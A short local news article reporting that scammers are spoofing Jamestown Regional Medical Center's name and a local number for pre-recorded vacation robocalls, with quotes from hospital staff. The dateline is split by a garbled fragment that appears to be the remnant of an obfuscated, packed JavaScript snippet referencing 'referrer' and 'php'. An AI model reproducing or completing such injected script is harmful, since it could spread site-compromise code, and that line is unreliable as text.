JAMESTOWN, ihbtb|var|u0026u|referrer|bdbnz||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – The Jamestown Regional Medical Center is informing the public of a scam involving them and a phone call.
“Calls from a number claiming to be “Jamestown Hospital” are not associated with Jamestown Regional Medical Center and should be considered a scam,” stated JRMC President & CEO K.C. DeBoer.
The calls come from “JMTN HOSP” and are a local 952-number. The call includes a pre-recorded message about booking an Orlando vacation.
“We learned today that scammers are using our name and local number to scam area residents,” DeBoer continued. “If you receive a call of this nature, please hang up.”
Marketing Manager Katie Ryan-Anderson says that as a trusted healthcare provider, they worry that people will accept these calls and fall victim to the scam. She says that because of the nature of the calls, authorities will unlikely be unable to trace the calls.
